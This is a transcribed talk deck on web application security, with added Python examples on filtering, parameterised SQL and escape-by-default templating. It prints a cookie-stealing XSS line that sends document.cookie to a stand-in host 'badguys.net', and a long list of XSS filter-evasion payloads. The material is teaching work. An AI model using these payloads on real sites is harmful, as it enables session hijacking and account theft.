Basic Web Application Security. User Input Kick Your Arse
Posted on 22-Dec-2015
![Page 1: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/1.jpg)
Basic Web Application Security
User Input
Kick Your Arse
Three Ways (All Awesome)
Validation
Passive (No touchy-touchy)
This is a Number.
2
This is not a Number.
a
This is really not a Number.
<script>alert('loldongs')</script>
Filtering
Destructive (One-Way Street)
Only letting the good stuff in.
or
Keeping out the bad stuff.
What's the diff? (Bro.)
Both can be error-prone...
What happens when you screw it up?
White-listing: usability problems.
Black-listing: security problems.
(Always a trade-off.)
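The three approaches run over the deck's own sample inputs. This is an added Python example, not code from the talk; the function names and the allowed-character set are my own choices, and the nested-tag input is taken from the deck's later "THIS HARD" list to show what one black-list pass does with it:

```python
import re

# Constructed sample inputs, echoing the slides: a number, a letter, and the
# script tag that is "really not a Number".
SAMPLES = ["2", "a", "<script>alert('loldongs')</script>"]


def validate_number(value: str) -> bool:
    """Passive validation (no touchy-touchy): answer yes or no and never
    modify the input. The caller rejects anything that fails."""
    return re.fullmatch(r"-?\d+", value) is not None


def whitelist_filter(value: str) -> str:
    """Destructive white-list filtering: keep only characters explicitly
    allowed (assumed set) and throw everything else away. One-way street."""
    return re.sub(r"[^A-Za-z0-9 .,'-]", "", value)


def blacklist_filter(value: str) -> str:
    """Destructive black-list filtering: strip the one thing we know is bad
    (a script tag, any case) in a single pass."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)


def demo() -> dict:
    """Run each approach over the samples plus two inputs that show the
    trade-off from the slides."""
    out = {"validate": [validate_number(s) for s in SAMPLES]}
    # Usability problem: the white-list silently mangles a legitimate name.
    out["whitelist_legit"] = whitelist_filter("Zoë O'Brien")
    out["whitelist_script"] = whitelist_filter(SAMPLES[2])
    # Security problem: the nested tag from the deck's "THIS HARD" list
    # survives a single black-list pass and comes out as a clean script tag.
    nested = "<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>"
    out["blacklist_nested"] = blacklist_filter(nested)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```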
Escaping
Transport: Point A to Point B
Data will be the same on both sides.
Different Media, Different Escaping
HTML
<b>Huh.</b>
<p><i><b>Huh.</b></i></p>
<b>Huh</b>
SQL
Sam O'Brien
INSERT INTO mah_peeps (name) VALUES ('Sam O\'Brien');
1, Sam O'Brien, 2010-09-02 18:30:00
XSS (Cross-Site Scripting)
XSS (XTREME Site Scripting)
Sticking Scripts Where They Don't Belong.
(You there, down the back. Stop sniggering.)
<script>alert('HACKED BY LOLDONGS')</script>
Amateurs!
<script>alert(document.cookie)</script>
Hmm.
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>
Oh shit.
Why is this uncool?
(Yeah! Why?)
Ooooh shit.
Oooooooooooh shit.
Oooooooooooooooooh shit.
Why is this really uncool?
(Because shut up.)
HTTP
Hyper-Text Thingy I-forgot-again
Stateless
No Idea Who You Are.
It can guess. (Badly.)
IP Address, Browser User-Agent
Sends a cookie with each request.
(A basket of goodies that the browser sends faithfully every request.)
The Server puts a unique ID in the basket.
PHPSESSID=123your456mum789; __utma=12948.23.4211414.5553; is_a_furry=1
Browser sends the ID every request.
PHPSESSID=123your456mum789
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>
Look again.
THEY HAVE YOUR COOKIE.
Ooooooooooooooooooooooo-
Preventing Shenanigans
HTML Validation: Really Hard.
HTML Filtering: Still Really Hard. Use a library, e.g. HTML Purifier.
HTML Escaping: Dead Easy. Most languages have stuff to handle this, e.g. htmlentities(), cgi.escape(), CGI.escape().
How hard is filtering?
(It’s just <script>, right?)
THIS HARD.
<IMG SRC=javascript:alert('a')>
<img src=javascript:alert("a")>
<img “””><script>alert('a')</script>”>
<IMG
SRC=javascr
ipt:ale
4;
t('XSS')>
<IMG
SRC=javascr
ipt:aler
t('XSS')>
<IMG SRC="jav ascript:alert('a');">
(Well, then.)
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCR\0IPT>alert('a')</SCR\0IPT>
<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>
<img onmouseover!#$%&=alert('a')>
<<SCRIPT>alert("a");//<</SCRIPT>
<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>
<SC\0RIPT SRC=http://foo/x.js?<B>
<script src=//foo/x.js>
<img src="javascript:alert('a')"
THIS HARD.
<iframe src=http://foo/x.html <
<body background="javascript:alert('a')">
<BODY ONLOAD=alert('a')>
<img dynsrc="javascript:alert('a')">
<img lowsrc="javascript:alert('a')">
<BGSOUND SRC=javascript:alert('a')>
<BR SIZE="&{alert('a')}">
<LAYER SRC="http://foo/x.html"></LAYER>
<link rel="stylesheet" href="javascript:alert('a');">
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>BODY{-moz-binding:url("http://foo/
x.xml#xss")}</STYLE>
(Well, then.)
<IMG SRC='vbscript:msgbox("a")'>
<img src="livescript:alert('a')">
¼script¾alert(¢XSS¢)¼/script¾ (US-ASCII encoding evasion)
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('a');">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
THIS HARD.
<DIV STYLE="background-image: url(javascript:alert('a'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\
006a
\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
0061
\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\
0029">
<DIV STYLE="background-image:
url(javascript:alert('a'))">
<DIV STYLE="width: expression(alert('a'));">
<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/
*/pression(alert("a"))'>
<STYLE TYPE="text/javascript">alert('a');</STYLE>
(Well, then.)
<STYLE>.x{background-
image:url("javascript:alert('a')");}</STYLE><A
CLASS=X></A>
<BASE HREF="javascript:alert('a');//">
<OBJECT TYPE="text/x-scriptlet"
DATA="http://foo/x.html"></OBJECT>
<EMBED SRC="http://foo/xss.swf"
AllowScriptAccess="always"></EMBED>
<EMBED
SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd
....jwvc3ZnPg=="
type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><!
[CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
One more thing about XSS.
(Groan.)
Remember <script>alert()</script>?
(Yes, I do. Shut up.)
alert() can be ANY JAVASCRIPT.
(Yes, and...?)
Do you have any forms on your page?
(Yes.)
Do you have any javascript functions your site uses to do anything useful?
(... Yes.)
Does your site make any AJAX calls to do anything useful?
(... Oh.)
That injected code can trigger forms, run javascript functions, or make AJAX calls.
(... Oooooh.)
Send someone to a link that looks like:
http://my.site/?user=<script>doStuff();</script>
(... Oooooooooh.)
Or store something that will output this on someone's profile page:
<script>doStuff();</script>
(... Oooooooooooooooh.)
... And you’re hosed.
(Shit.)
The Human Element
Touchy-Feely Commie Bullshit.
We are very fallible.
We will forget things.
When time gets short, we take the easy path.
Design systems so that they naturally encourage security.
SQL
insert("INSERT INTO posts VALUES ('".sql_safe($title)."', '".sql_safe($content)."', '".sql_safe($author)."')");
or
insert("INSERT INTO posts VALUES (:title, :content, :author)", $title, $content, $author);
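Both SQL versions side by side, as an added Python/sqlite3 example rather than the talk's PHP; the posts table, the sample post and the helper names are constructed here. It shows what the apostrophe in O'Brien does when the escaping step is skipped on the hand-rolled path, and that the placeholder version has no such step to forget:

```python
import sqlite3

# Constructed post, with the deck's apostrophe-laden author name.
POST = {"title": "Escaping", "content": "Different media, different escaping.",
        "author": "Sam O'Brien"}


def fresh_db() -> sqlite3.Connection:
    """In-memory database with the posts table the slide inserts into."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (title TEXT, content TEXT, author TEXT)")
    return conn


def insert_by_concatenation(conn: sqlite3.Connection, post: dict) -> None:
    """The hand-rolled version with the sql_safe() step forgotten: values are
    glued straight into the SQL text. The apostrophe in O'Brien ends the
    string literal early and the statement is no longer valid SQL."""
    sql = ("INSERT INTO posts VALUES ('" + post["title"] + "', '"
           + post["content"] + "', '" + post["author"] + "')")
    conn.execute(sql)


def insert_with_parameters(conn: sqlite3.Connection, post: dict) -> None:
    """Named placeholders, as on the slide: the driver sends the SQL and the
    data separately, so the apostrophe is only ever data."""
    conn.execute("INSERT INTO posts VALUES (:title, :content, :author)", post)


def concatenation_breaks(post: dict) -> bool:
    """True if the concatenated statement is rejected by the database."""
    conn = fresh_db()
    try:
        insert_by_concatenation(conn, post)
    except sqlite3.OperationalError:
        return True
    return False


def roundtrip(post: dict) -> dict:
    """Insert with parameters and read back: data is the same on both sides."""
    conn = fresh_db()
    insert_with_parameters(conn, post)
    title, content, author = conn.execute(
        "SELECT title, content, author FROM posts").fetchone()
    return {"title": title, "content": content, "author": author}


if __name__ == "__main__":
    print("concatenation rejected:", concatenation_breaks(POST))
    print("parameterised round trip:", roundtrip(POST))
```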
HTML
<h3><%= title %> - <%= date %></h3><div><%= raw(post_body) %></div><p>Written by <%= author %></p>
or
<h3><?=htmlentities($title);?> - <?=htmlentities($date);?></h3><div><?=$post_body;?></div><p>Written by <?=htmlentities($author);?></p>
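The escape-by-default idea behind the ERB version, as an added Python example (not the talk's template code): a minimal renderer where every value is escaped unless wrapped in a Raw() marker standing in for ERB's raw(); the template string and helper names are constructed here:

```python
import html
import re


class Raw(str):
    """Marker for a value the developer has deliberately declared to be HTML
    already (the counterpart of ERB's raw()). Only these skip escaping."""


def render(template: str, **values) -> str:
    """Tiny {{ name }} renderer that escapes every value by default. The safe
    thing needs no extra call; opting out takes an explicit Raw() wrapper."""
    def substitute(match) -> str:
        value = values[match.group(1)]
        if isinstance(value, Raw):
            return str(value)
        return html.escape(str(value), quote=True)
    return re.sub(r"\{\{\s*(\w+)\s*\}\}", substitute, template)


# Constructed template mirroring the slide's post layout.
POST_TEMPLATE = ("<h3>{{ title }} - {{ date }}</h3>"
                 "<div>{{ post_body }}</div>"
                 "<p>Written by {{ author }}</p>")


def render_post(title: str, date: str, post_body: str, author: str) -> str:
    """post_body is the only field allowed to carry markup, and the Raw()
    wrapper makes that decision visible at the call site."""
    return render(POST_TEMPLATE, title=title, date=date,
                  post_body=Raw(post_body), author=author)


if __name__ == "__main__":
    print(render_post("<script>alert('loldongs')</script>", "2010-09-02",
                      "<p>Hello.</p>", "Sam O'Brien"))
```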
Questions?
Now get out.